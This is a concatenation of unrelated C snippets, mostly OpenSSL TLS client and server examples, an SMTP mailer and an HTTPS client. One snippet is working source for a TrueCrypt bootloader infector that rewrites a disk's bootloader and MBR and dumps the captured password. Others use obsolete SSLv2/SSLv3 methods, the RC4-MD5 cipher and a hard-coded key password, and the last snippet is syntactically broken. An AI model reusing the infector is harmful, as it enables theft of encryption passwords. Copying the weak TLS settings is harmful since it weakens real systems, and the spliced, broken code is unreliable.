int main () { int err; int sd; struct sockaddr_in sa; SSL_CTX* ctx; SSL* ssl; X509* server_cert; char* str; char buf [4096]; SSL_METHOD *meth; SSLeay_add_ssl_algorithms(); //设置支持SSL算法 meth = (SSL_METHOD*)SSLv2_client_method(); //客户端设置SSLV2版本 SSL_load_error_strings(); //提供将错误解析为字符串的功能 ctx = SSL_CTX_new (meth); CHK_NULL(ctx); //创建一个SSL上下文环境,每个进程守护一个SSL_CTX结构体 CHK_SSL(err); /* ----------------------------------------------- */ /* Create a socket and connect to server using normal socket calls. */ sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket"); // memset (&sa, '\0', sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr ("127.0.0.1"); /* Server IP */ sa.sin_port = htons (1111); /* Server Port number */ err = connect(sd, (struct sockaddr*) &sa, sizeof(sa)); CHK_ERR(err, "connect"); /* ----------------------------------------------- */ /* Now we have TCP conncetion. Start SSL negotiation. */ //创建一个维护当前连接信息 ssl = SSL_new (ctx); CHK_NULL(ssl); //将SSL绑定到套接字上 SSL_set_fd (ssl, sd); //建立SSL连接 err = SSL_connect (ssl); CHK_SSL(err); /* Following two steps are optional and not required for data exchange to be successful. */ /* Get the cipher - opt */ printf ("SSL connection using %s\n", SSL_get_cipher (ssl)); /* Get server's certificate (note: beware of dynamic allocation) - opt */ //获取服务端证书 server_cert = SSL_get_peer_certificate (ssl); CHK_NULL(server_cert); printf ("Server certificate:\n"); str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0); CHK_NULL(str); printf ("\t subject: %s\n", str); OPENSSL_free (str); str = X509_NAME_oneline (X509_get_issuer_name (server_cert),0,0); CHK_NULL(str); printf ("\t issuer: %s\n", str); OPENSSL_free (str); /* We could do all sorts of certificate verification stuff here before deallocating the certificate. */ //释放服务端证书 X509_free (server_cert); /* --------------------------------------------------- */ /* DATA EXCHANGE - Send a message and receive a reply. */ err = SSL_write (ssl, "Hello World!", strlen("Hello World!")); CHK_SSL(err); err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err); buf[err] = '\0'; printf ("Got %d chars:'%s'\n", err, buf); SSL_shutdown (ssl); /* send SSL/TLS close_notify */ /* Clean up. */ close(sd); SSL_free (ssl); SSL_CTX_free (ctx); }
/*****************parent process tcp connection use to manage******************************/ void server_mgr(int serverPort, int pipefd, int pid) { int flag = 0; int err, sockfd, clientfd, i; int ready = 0; struct sockaddr_in serverSock, clientSock; size_t len; char buf[4096]; int ppid; char username[4096], passwd[4096]; SSL_CTX* ctx; SSL* ssl; sleep(1); //in order to avoid coming out too fast setupCTXServer(SER_CERTF, SER_KEYF, &ctx);//setup certificate //create a TCP socket sockfd = socket(AF_INET, SOCK_STREAM, 0); memset(&serverSock, 0, sizeof(serverSock)); serverSock.sin_family = AF_INET; serverSock.sin_addr.s_addr = htonl(INADDR_ANY); serverSock.sin_port = htons(serverPort); //bind step if (bind(sockfd, (struct sockaddr*) &serverSock, sizeof (serverSock)) < 0) PERROR("tcp bind error! exit!"); //listen step: listening to be a server why 5 do not know I guess it is the signal to kernel if (listen (sockfd, 5) < 0) PERROR("tcp listen error! exit!"); len = sizeof(clientSock); //accept step clientfd = accept(sockfd, (struct sockaddr*) &clientSock, &len); close(sockfd);//do not need sockfd anymore after tcp connection printf("Connection from %s:%i\n", inet_ntoa(clientSock.sin_addr), ntohs(clientSock.sin_port)); //build SSL on the tcp connection ssl = SSL_new(ctx); CHK_NULL(ssl); SSL_set_fd(ssl, clientfd); err = SSL_accept(ssl); CHK_SSL(err); //login part to check username and password while(!flag) { err = SSL_read(ssl, username, sizeof(buf) - 1);//read username CHK_SSL(err); err = SSL_read(ssl, passwd, sizeof(buf) - 1);//read passwd CHK_SSL(err); if(check_login(username + 1, passwd + 1))//client authenticate to call the check function { buf[0]='o'; buf[1]=0; SSL_write(ssl, buf, sizeof(buf) - 1);//check successfully and send to client flag = 1; } else { buf[0]='f'; buf[1]=0; SSL_write(ssl, buf, sizeof(buf) - 1);//check failed and send to client } } printf("Welcome %s:\n", username + 1); //clean the password(security reason!!! Do not forget buffer overflow) memset(passwd, 0, sizeof(passwd)); //receive key part, exchange key part, abort part while (1) { ready = 0; while (!ready) { err = SSL_read(ssl, buf, sizeof(buf) - 1); CHK_SSL(err); ready = ready + receiveKey(buf, err, key); } // buf[1] is 0 means client want to abort if (buf[1] == 0) { printf("disconnect!!!\n"); kill(pid, SIGTERM);//SIGTERM is more friendly wait(0);//wait for 0 process break; } //tell the key to udp connection tellChildProcess(key, pipefd, 'k'); } //clean everything close(sockfd); SSL_free (ssl); SSL_CTX_free (ctx); }
int main(int argc, char* argv[]) { if (argc < 2) { fprintf(stderr, "Usage: %s <device_to_infect>\n", argv[0]); exit(-1); } /* Opening Device */ char * dev_name = argv[1]; int dev_fd = open(dev_name, O_RDWR); CHK(dev_fd); /* Retrieve MBR */ char mbr[SECTOR_SIZE]; CHK(read(dev_fd, mbr, SECTOR_SIZE)); //write(1, mbr, SECTOR_SIZE); /* Retrieve TrueCrypt BootLoader position using MBR */ char tc_bl_sect = mbr[TC_SECT_OFFSET_IN_MBR] - 1; char tc_bl_sect_count = mbr[TC_SECT_COUNT_OFFSET_IN_MBR]; size_t comp_bl_sz = /* *(unsigned short*) (mbr + TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET); */ tc_bl_sect_count * SECTOR_SIZE; printf("TrueCrypt BootLoader sector num = %d\n" "TrueCrypt BootLoader sector count = %d\n" "TrueCrypt BootLoader size = %d\n", tc_bl_sect, tc_bl_sect_count, comp_bl_sz); /* Retrieve the compressed bootloader content */ char * comp_bootloader = malloc(comp_bl_sz * sizeof(char)); CHK_NULL(comp_bootloader); CHK(lseek(dev_fd, tc_bl_sect * SECTOR_SIZE, SEEK_SET)); CHK(read(dev_fd, comp_bootloader, comp_bl_sz)); /* Dump it to a file to unzip it */ int comp_bl_fd = open(COMPRESSED_BOOTLOADER_FILE, O_WRONLY | O_CREAT | O_TRUNC, 0600); CHK(comp_bl_fd); write(comp_bl_fd, comp_bootloader, comp_bl_sz); free(comp_bootloader); /* Unzip using gzip */ CHK(system("gzip -d -f "COMPRESSED_BOOTLOADER_FILE)); /* Read the unzipped bootloader */ int bootloader_fd = open(DECOMPRESSED_BOOTLOADER_FILE, O_RDWR); CHK(bootloader_fd); struct stat bl_st; CHK(fstat(bootloader_fd, &bl_st)); printf("uncompressed bootloader size = 0x%x\n", (unsigned int)bl_st.st_size); printf("infection overhead = 0x%x\n", INFECTION_OVERHEAD); size_t uncompressed_bl_sz = get_tc_mem_required(mbr, SECTOR_SIZE); size_t infected_bl_sz = uncompressed_bl_sz + INFECTION_OVERHEAD; char * bootloader = malloc(infected_bl_sz * sizeof(char)); CHK_NULL(bootloader); memset(bootloader, 0, infected_bl_sz); CHK(read(bootloader_fd, bootloader, uncompressed_bl_sz)); //write(1, bootloader, uncompressed_bl_sz); WEAK_CHK(unlink(DECOMPRESSED_BOOTLOADER_FILE)); /* Checking if the bootloader is already infected */ puts("Checking for prior infection..."); if(already_infected(mbr)) { puts("TrueCrypt is already infected, dumping password"); return dump_password(dev_fd); } /* Infect BootLoader */ infect_bootloader(bootloader, uncompressed_bl_sz, infected_bl_sz); /* Rezip the bootlader */ int patched_bl_fd = open(PATCHED_BOOTLOADER_FILE, O_CREAT | O_TRUNC | O_RDWR, 0700); CHK(patched_bl_fd); CHK(write(patched_bl_fd, bootloader, infected_bl_sz)); CHK(close(patched_bl_fd)); CHK(system("gzip -n --best -f "PATCHED_BOOTLOADER_FILE)); /* Rewrite it */ int comp_patched_bl_fd = open(COMPRESSED_PATCHED_BOOTLOADER_FILE, O_RDONLY); CHK(comp_patched_bl_fd); struct stat pbl_st; CHK(fstat(comp_patched_bl_fd, &pbl_st)); size_t cpbl_sz = pbl_st.st_size; char * recomp_bootloader = malloc(cpbl_sz * sizeof(char)); CHK(read(comp_patched_bl_fd, recomp_bootloader, cpbl_sz)); CHK(lseek(dev_fd, tc_bl_sect * SECTOR_SIZE, SEEK_SET)); CHK(write(dev_fd, recomp_bootloader, cpbl_sz)); /* Patch the checksums in MBR (bypass the compressed bootloader one) */ CHK(patch_chksum(mbr)); /* Update compressed size in MBR */ /* Actually unnecessary, this is just used for checksum */ /* (Works with this line commented out) */ *(unsigned short *)&mbr[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = cpbl_sz; printf("New compressed bootloader size = %d\n", cpbl_sz); /* Update the required mem in MBR */ *(unsigned short *)&mbr[TC_MEM_REQUIRED_OFFSET] = infected_bl_sz; /* Rewrite MBR */ CHK(lseek(dev_fd, 0, SEEK_SET)); CHK(write(dev_fd, mbr, SECTOR_SIZE)); CHK(close(dev_fd)); CHK(close(comp_patched_bl_fd)); free(bootloader); free(recomp_bootloader); WEAK_CHK(unlink(COMPRESSED_PATCHED_BOOTLOADER_FILE)); return 0; }
//pki client void doPKIClient(pid_t cpid, int* pipefd,char* newkeyiv,int port, int PORT, char* ip)//(int argc, char* argv[]) { int i; int err; int sd; struct sockaddr_in sa; SSL_CTX* ctx;//create a context for one or more ssl session SSL* ssl;//hold ssl connection structure X509* server_cert; char* str; char buf [4096]; SSL_METHOD *meth; SSLeay_add_ssl_algorithms(); meth = SSLv23_client_method(); SSL_load_error_strings(); ctx = SSL_CTX_new (meth); CHK_NULL(ctx); CHK_SSL(err); SSL_CTX_set_verify(ctx,SSL_VERIFY_PEER,NULL); SSL_CTX_load_verify_locations(ctx,CCACERT,NULL);//load cert, location for ca if (SSL_CTX_use_certificate_file(ctx, CCERTF, SSL_FILETYPE_PEM) <= 0) {//load the fisrt cert from file to ctx ERR_print_errors_fp(stderr); exit(-2); } if (SSL_CTX_use_PrivateKey_file(ctx, CKEYF, SSL_FILETYPE_PEM) <= 0) {//load private key for use with ssl ERR_print_errors_fp(stderr); exit(-3); } if (!SSL_CTX_check_private_key(ctx)) {//check private key with cert printf("Private key does not match the certificate public keyn"); exit(-4); } /* ----------------------------------------------- */ /* Create a socket and connect to server using normal socket calls. */ sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket"); memset (&sa, '\0', sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr (ip); /* Server IP */ sa.sin_port = htons (port); /* Server Port number */ err = connect(sd, (struct sockaddr*) &sa, sizeof(sa)); CHK_ERR(err, "connect"); /* ----------------------------------------------- */ /* Now we have TCP conncetion. Start SSL negotiation. */ ssl = SSL_new (ctx); CHK_NULL(ssl); SSL_set_fd (ssl, sd);//assign a socket to ssl //start ssl session with remote server err = SSL_connect (ssl); CHK_SSL(err); /* Following two steps are optional and not required for data exchange to be successful. */ /* Get the cipher - opt */ printf ("SSL connection using %s\n", SSL_get_cipher (ssl)); /* Get server's certificate (note: beware of dynamic allocation) - opt */ server_cert = SSL_get_peer_certificate (ssl); CHK_NULL(server_cert); printf ("Server certificate:\n"); //blx verifying the common name char commonName[512]; X509_NAME *name=X509_get_subject_name (server_cert); X509_NAME_get_text_by_NID(name,NID_commonName,commonName,512); //printf("%s\n",commonName); if(strcmp(commonName,ServerCN)!=0) { printf("wrong CN\n"); exit(-1); } printf("right CN\n"); str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0); CHK_NULL(str); printf ("\t subject: %s\n", str); OPENSSL_free (str); str = X509_NAME_oneline (X509_get_issuer_name (server_cert),0,0); CHK_NULL(str); printf ("\t issuer: %s\n", str); OPENSSL_free (str); /* We could do all sorts of certificate verification stuff here before deallocating the certificate. */ X509_free (server_cert); /* --------------------------------------------------- */ /* DATA EXCHANGE - Send a message and receive a reply. */ //generate rand iv and key as initial generateRandKey(newkeyiv); generateRandIV(newkeyiv); err = SSL_write (ssl, newkeyiv, 32); CHK_SSL(err);//write new key and iv to server err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);//read reply from server buf[err] = '\0'; //if(err == 0){continue;} //printf ("Got %d chars:'%s'\n", err, buf); printf ("%s\n", buf); write(pipefd[1], newkeyiv, 32); //not the first time, user decide while(1){ menuOp(cpid,newkeyiv); err = SSL_write (ssl, newkeyiv, 32); CHK_SSL(err);//write new key and iv to server err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err);//read reply from server buf[err] = '\0'; //if(err == 0){continue;} //printf ("Got %d chars:'%s'\n", err, buf); printf ("%s\n", buf); write(pipefd[1], newkeyiv, 32); } SSL_shutdown (ssl); /* send SSL/TLS close_notify */ /* Clean up. */ close (sd); SSL_free (ssl); SSL_CTX_free (ctx); }
int main () { int err; int i; int s, AcceptSocket; #ifdef _WIN32 WORD wVersionRequested; WSADATA wsaData; #endif /* */ struct sockaddr_in service; pthread_t pid; size_t client_len; SSL_CTX *ctx; SSL *ssl; X509 *client_cert; char *str; char buf[1024]; SSL_METHOD *meth; //加载EVP cipher/digest算法 SSLeay_add_ssl_algorithms (); //加载crypto/ssl错误提示 SSL_load_error_strings (); //为服务器构造TLSv1 SSL_METHOD结构 meth = SSLv3_server_method (); //建立新的SSL上下文 ctx = SSL_CTX_new (meth); if (!ctx) { ERR_print_errors_fp (stderr); exit (2); } //加载可信任证书库: 为SSL_CTX对象提供一个默认的信任证书 if ((!SSL_CTX_load_verify_locations (ctx, CAFILE, NULL)) || (!SSL_CTX_set_default_verify_paths (ctx))) { printf ("error load verify locations.\n"); exit (1); } //加载服务器端证书 if (SSL_CTX_use_certificate_file (ctx, CERTF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp (stderr); exit (3); } //加载服务器私钥文件 if (SSL_CTX_use_PrivateKey_file_pass (ctx, KEYF, "123456") <= 0) { ERR_print_errors_fp (stderr); exit (4); } //验证私钥与证书是否一致 if (!SSL_CTX_check_private_key (ctx)) { fprintf (stderr, "Private key does not match the certificate public key\n"); exit (5); } s_server_verify = SSL_VERIFY_PEER | SSL_VERIFY_FAIL_IF_NO_PEER_CERT | SSL_VERIFY_CLIENT_ONCE; SSL_CTX_set_verify (ctx, s_server_verify, verify_callback_server); //当需要客户端验证的时候,服务器把CAfile里面的可信任CA证书发往客户端。 SSL_CTX_set_client_CA_list (ctx, SSL_load_client_CA_file (CAFILE)); #ifdef _WIN32 wVersionRequested = MAKEWORD (2, 2); err = WSAStartup (wVersionRequested, &wsaData); if (err != 0) { printf ("err\n"); return -1; } #endif /* */ //首先建立连接 s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) return -1; service.sin_family = AF_INET; service.sin_addr.s_addr = INADDR_ANY; //inet_addr("127.0.0.1"); service.sin_port = htons (8888); if (bind (s, (struct sockaddr *) &service, sizeof (service)) < 0) { printf ("bind() failed.\n"); close (s); return -1; } if (listen (s, 1) < 0) printf ("Error listening on socket.\n"); printf ("recv .....\n"); //openssl是不支持多线程的,需要自己做加锁处理 //参见:http://blog.csdn.net/jaylong35/article/details/6988690 lock_cs = OPENSSL_malloc (CRYPTO_num_locks () * sizeof (pthread_mutex_t)); lock_count = OPENSSL_malloc (CRYPTO_num_locks () * sizeof (long)); for (i = 0; i < CRYPTO_num_locks (); i++) { lock_count[i] = 0; pthread_mutex_init (&(lock_cs[i]), NULL); } //通过这两个设置就可以解决HTTPS多线程请求出现crash的问题 CRYPTO_set_id_callback ((unsigned long (*)()) pthreads_thread_id); CRYPTO_set_locking_callback ((void (*)()) pthreads_locking_callback); while (1) { struct timeval tv; fd_set fdset; char *str = "JDDH-JDECC3-JDCIPH-JDMD"; tv.tv_sec = 1; tv.tv_usec = 0; FD_ZERO (&fdset); FD_SET (s, &fdset); select (s + 1, &fdset, NULL, NULL, (struct timeval *) &tv); if (FD_ISSET (s, &fdset)) { AcceptSocket = accept (s, NULL, NULL); ssl = SSL_new (ctx); //提交一份自己能够支持的加密方法的列表 //SSL_set_cipher_list(ssl,"ECDH-RSA-AES256-SHA"); SSL_set_cipher_list (ssl, "RC4-MD5"); CHK_NULL (ssl); //将SSL与socket进行关联 err = SSL_set_fd (ssl, AcceptSocket); if (err > 0) { err = pthread_create (&pid, NULL, &thread_main, (void *) ssl); pthread_detach (pid); } else continue; } } SSL_CTX_free (ctx); return 0; }
//pki server void doPKIServer(pid_t cpid, int* pipefd,char* newkeyiv, int port, int PORT, char* ip)//(int argc, char* argv[]) { int i; int err; int listen_sd; int sd; struct sockaddr_in sa_serv; struct sockaddr_in sa_cli; size_t client_len; SSL_CTX* ctx; SSL* ssl; X509* client_cert; char* str; char buf [4096]; SSL_METHOD *meth; /* SSL preliminaries. We keep the certificate and key with the context. */ SSL_load_error_strings(); SSLeay_add_ssl_algorithms(); meth = SSLv23_server_method(); ctx = SSL_CTX_new (meth); if (!ctx) { ERR_print_errors_fp(stderr); exit(2); } SSL_CTX_set_verify(ctx,SSL_VERIFY_PEER,NULL); /* whether verify the certificate */ SSL_CTX_load_verify_locations(ctx,SCACERT,NULL); if (SSL_CTX_use_certificate_file(ctx, SCERTF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); exit(3); } if (SSL_CTX_use_PrivateKey_file(ctx, SKEYF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); exit(4); } if (!SSL_CTX_check_private_key(ctx)) { fprintf(stderr,"Private key does not match the certificate public key\n"); exit(5); } /* ----------------------------------------------- */ /* Prepare TCP socket for receiving connections */ listen_sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(listen_sd, "socket"); memset (&sa_serv, '\0', sizeof(sa_serv)); sa_serv.sin_family = AF_INET; sa_serv.sin_addr.s_addr = INADDR_ANY; sa_serv.sin_port = htons (PORT); /* Server Port number */ err = bind(listen_sd, (struct sockaddr*) &sa_serv, sizeof (sa_serv)); CHK_ERR(err, "bind"); /* Receive a TCP connection. */ err = listen (listen_sd, 5); CHK_ERR(err, "listen"); client_len = sizeof(sa_cli); sd = accept (listen_sd, (struct sockaddr*) &sa_cli, &client_len); CHK_ERR(sd, "accept"); close (listen_sd); printf ("Connection from %lx, port %x\n", (long unsigned int)sa_cli.sin_addr.s_addr, sa_cli.sin_port); /* ----------------------------------------------- */ /* TCP connection is ready. Do server side SSL. */ ssl = SSL_new (ctx); CHK_NULL(ssl); SSL_set_fd (ssl, sd); err = SSL_accept (ssl); CHK_SSL(err); /* Get the cipher - opt */ printf ("SSL connection using %s\n", SSL_get_cipher (ssl)); /* Get client's certificate (note: beware of dynamic allocation) - opt */ client_cert = SSL_get_peer_certificate (ssl); if (client_cert != NULL) { printf ("Client certificate:\n"); //blx verify the common name char commonName[512]; X509_NAME *name=X509_get_subject_name (client_cert); X509_NAME_get_text_by_NID(name,NID_commonName,commonName,512); //printf("%s\n",commonName); if(strcmp(commonName,ClientCN)!=0) { printf("wrong CN\n"); exit(-1); } printf("right CN\n"); str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0); CHK_NULL(str); printf ("\t subject: %s\n", str); OPENSSL_free (str); str = X509_NAME_oneline (X509_get_issuer_name (client_cert), 0, 0); CHK_NULL(str); printf ("\t issuer: %s\n", str); OPENSSL_free (str); /* We could do all sorts of certificate verification stuff here before deallocating the certificate. */ X509_free (client_cert); } else printf ("Client does not have certificate.\n"); /* DATA EXCHANGE - Receive message and send reply. */ while(1){//key read new key and iv err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err); if(err ==0){continue;} buf[err] = '\0'; //printf ("Got %d chars:'%s'\n", err, buf); for(i=0;i<32;i++) { newkeyiv[i] = buf[i]; } write(pipefd[1], newkeyiv, 32);//write the new key and iv to tunnel process err = SSL_write (ssl, "server recieved new key or iv.", strlen("server recieved new key or iv.")); CHK_SSL(err);//write reply to client } /* Clean up. */ close (sd); SSL_free (ssl); SSL_CTX_free (ctx); }
// sending email void sendemail(char *email, char *body) { int sockfd; int retval = 0; int err; char *host_name = "smtp.fakessh.eu"; struct sockaddr_in their_addr; struct hostent *hent; char buf[1500] = {0}; char rbuf[1500] = {0}; char login[128] = {0}; char pass[128] = {0}; //initialize SSL SSL_CTX *ctx; SSL *ssl; SSL_METHOD *meth; SSLeay_add_ssl_algorithms(); meth = SSLv23_method(); SSL_load_error_strings(); SSL_library_init(); ctx = SSL_CTX_new(meth); CHK_NULL(ctx); fd_set readfds; struct timeval timeout; //Define a timeout for resending data. timeout.tv_sec = 2; timeout.tv_usec = 0; #ifdef WIN32 WSADATA WSAData; WSAStartup(MAKEWORD(2, 2), &WSAData); #endif hent = gethostbyname(host_name); memset(&their_addr, 0, sizeof(their_addr)); their_addr.sin_family = AF_INET; their_addr.sin_port = htons(587); their_addr.sin_addr = *((struct in_addr *)hent->h_addr); //connecting mail server and reconnecting if no response in 2 seconds sockfd = open_socket((struct sockaddr *)&their_addr); memset(rbuf,0,1500); FD_ZERO(&readfds); FD_SET(sockfd, &readfds); retval = select(sockfd+1, &readfds, NULL, NULL, &timeout); while(retval <= 0) { printf("reconnect...\n"); sleep(2); close(sockfd); sockfd = open_socket((struct sockaddr *)&their_addr); memset(rbuf,0,1500); FD_ZERO(&readfds); FD_SET(sockfd, &readfds); retval = select(sockfd+1, &readfds, NULL, NULL, &timeout); } memset(rbuf, 0, 1500); recv(sockfd, rbuf, 1500, 0); printf("%s\n", rbuf); //EHLO memset(buf, 0, 1500); sprintf(buf, "EHLO localhost\r\n"); send(sockfd, buf, strlen(buf), 0); memset(rbuf, 0, 1500); recv(sockfd, rbuf, 1500, 0); printf("%s\n", rbuf); //START_TLS with OPENSSL memset(buf,0, 1500); sprintf(buf, "STARTTLS\r\n"); send(sockfd, buf, strlen(buf), 0); memset(rbuf, 0, 1500); recv(sockfd, rbuf, 1500, 0); printf("%s\n", rbuf); //AUTH LOGIN ssl = SSL_new(ctx); CHK_NULL(ssl); SSL_set_fd (ssl, sockfd); err = SSL_connect(ssl); CHK_SSL(err); memset(buf,0, 1500); sprintf(buf, "EHLO localhost\r\n"); send_line(ssl,buf); recv_line(ssl); memset(buf,0, 1500); sprintf(buf, "AUTH LOGIN\r\n"); send_line(ssl,buf); recv_line(ssl); //USER memset(buf, 0, 1500); sprintf(buf,"fakessh"); memset(login, 0, 128); base64(login, buf, strlen(buf)); sprintf(buf, "%s\r\n", login); send_line(ssl,buf); recv_line(ssl); //PASSWORD memset(buf, 0, 1500); sprintf(buf, "----"); memset(pass, 0, 128); base64(pass, buf, strlen(buf)); sprintf(buf, "%s\r\n", pass); send_line(ssl,buf); recv_line(ssl); //MAIL FROM memset(buf,0, 1500); sprintf(buf, "MAIL FROM:<*****@*****.**>\r\n"); send_line(ssl,buf); recv_line(ssl); //RCPT TO first receiver memset(buf, 0, 1500); sprintf(buf, "RCPT TO:<*****@*****.**>\r\n"); send_line(ssl,buf); recv_line(ssl); //RCPT TO second receiver and more receivers can be added //memset(buf, 0, 1500); //sprintf(buf, "RCPT TO:<*****@*****.**>\r\n"); //send_line(ssl,buf); //recv_line(ssl); //DATA ready to send mail content send_line(ssl,"DATA\r\n"); recv_line(ssl); //send mail content£¬"\r\n.\r\n" is the end mark of content memset(buf, 0, 1500); sprintf(buf, "%s\r\n.\r\n", body); send_line(ssl,buf); recv_line(ssl); printf("mail send!\n"); //QUIT send_line(ssl,"QUIT\r\n"); recv_line(ssl); //free SSL and close socket SSL_shutdown (ssl); close(sockfd); SSL_free (ssl); SSL_CTX_free (ctx); #ifdef WIN32 WSACleanup(); #endif return; }
int main () { int err; int sd; struct sockaddr_in sa; SSL_CTX* ctx; SSL* ssl; X509* server_cert; char* str; char buf [8096]; SSL_METHOD *meth; SSLeay_add_ssl_algorithms(); #ifndef OPENSSL_NO_SSL2 meth = (SSL_METHOD*)SSLv2_client_method(); #else ///meth = (SSL_METHOD*)SSLv3_client_method(); //连接https 需要使用tls类型的 meth = (SSL_METHOD*)TLSv1_2_client_method(); //return ThrowException(Exception::Error(String::New("SSLv2 methods disabled"))); #endif SSL_load_error_strings(); ctx = SSL_CTX_new (meth); if(ctx==NULL) { printd("ctx is NULL\n"); exit(1); } CHK_SSL(err); /* ----------------------------------------------- */ /* Create a socket and connect to server using normal socket calls. */ sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket"); memset (&sa, '\0', sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr (SERVERIP); /* Server IP */ sa.sin_port = htons (SERVERPORT); /* Server Port number */ err = connect(sd, (struct sockaddr*) &sa, sizeof(sa)); CHK_ERR(err, "connect"); /* ----------------------------------------------- */ /* Now we have TCP conncetion. Start SSL negotiation. */ printd("connect to %s:%d success.\n",SERVERIP, SERVERPORT); ssl = SSL_new (ctx); CHK_NULL(ssl); printd("SSL_new ok\n"); SSL_set_fd (ssl, sd); printd("Set fd OK\n"); err = SSL_connect (ssl); CHK_SSL(err); /* Following two steps are optional and not required for data exchange to be successful. */ /* Get the cipher - opt */ printd ("SSL connection using %s\n", SSL_get_cipher (ssl)); //验证证书是否可以信任 if ( X509_V_OK != SSL_get_verify_result(ssl) ) { printd("SSL verify error\n"); int color = 32; printf("\033[%dmHello, world.\n\033[0m", color); } /* Get server's certificate (note: beware of dynamic allocation) - opt */ //比如连接 https时,需要打开以下选项 #if 1 server_cert = SSL_get_peer_certificate (ssl); CHK_NULL(server_cert); printd ("Server certificate:\n"); str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0); CHK_NULL(str); printd ("\t subject: %s\n", str); OPENSSL_free (str); str = X509_NAME_oneline (X509_get_issuer_name (server_cert),0,0); CHK_NULL(str); printd ("\t issuer: %s\n", str); OPENSSL_free (str); /* We could do all sorts of certificate verification stuff here before deallocating the certificate. */ X509_free (server_cert); #endif /* --------------------------------------------------- */ /* DATA EXCHANGE - Send a message and receive a reply. */ #ifdef AUTH //init base 64 //come from : http://doctrina.org/Base64-With-OpenSSL-C-API.html BIO *bio, *b64; char* base64EncodeOutput; BUF_MEM *bufferPtr; char message[] = USER ":"******"base encode str:->%s<- message len:%d\n", message, message_len); b64 = BIO_new(BIO_f_base64()); bio = BIO_new(BIO_s_mem()); bio = BIO_push(b64, bio); /* ///!IMPORTANT //BIO_set_flags(bio, BIO_FLAGS_BASE64_NO_NL); //Ignore newlines - write everything in one line //BIO_FLAGS_BASE64_NO_NL: 编码结果中,每64个字符换行一次,整个编码后的字符串的末尾也有换行 //如果有这个选项,测试结尾会出现0x76 0x7f字符 0x7f是del所以打印时显示正常,其实不正常 */ BIO_write(bio, message, strlen(message)); BIO_flush(bio); BIO_get_mem_ptr(bio, &bufferPtr); BIO_set_close(bio, BIO_NOCLOSE); BIO_free_all(bio); char b64text[1024]={0}; strcpy(b64text, (*bufferPtr).data); memcpy(b64text, (*bufferPtr).data, bufferPtr->length); printd("base64 encode str: ->%s<-, size:%ld\n", b64text, strlen(b64text)); //printd("%x %x %x %x %x %x\n", b64text[0],b64text[1],b64text[2],b64text[3],b64text[4],b64text[5]); #endif /* * 以下是模拟浏览器登陆https://172.20.1.209:8001的过程 * * 服务器是python做的,服务器代码从: * https://github.com/SevenW/httpwebsockethandler.git * 下载, * 运行服务器的命令: * python ExampleWSServer.py 8001 secure u:2 */ char http_get_str[2048] = {0}; sprintf(http_get_str, "GET / HTTP/1.1\r\n" "Host: %s:%d \r\n" #ifdef AUTH "Authorization: Basic %s\r\n" #endif "Connection: keep-alive\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/* ;q=0.8\r\n" "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\r\n" "Accept-Encoding: gzip, deflate, sdch\r\n" "Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2\r\n" "\r\n" ,SERVERIP, SERVERPORT #ifdef AUTH ,b64text #endif ); printd("http get str: ->%s<- len:%ld\n", http_get_str, strlen(http_get_str)); err = SSL_write (ssl, http_get_str, strlen(http_get_str)); CHK_SSL(err); err = 0; int c1=0; do{ err = SSL_read (ssl, buf+c1, sizeof(buf) - c1 - 1); CHK_SSL(err); c1 += err; while(err>0); buf[err] = '\0'; printd ("Got %d chars:'%s'\n", err, buf); SSL_shutdown (ssl); /* send SSL/TLS close_notify */ /* Clean up. */ close (sd); SSL_free (ssl); SSL_CTX_free (ctx); }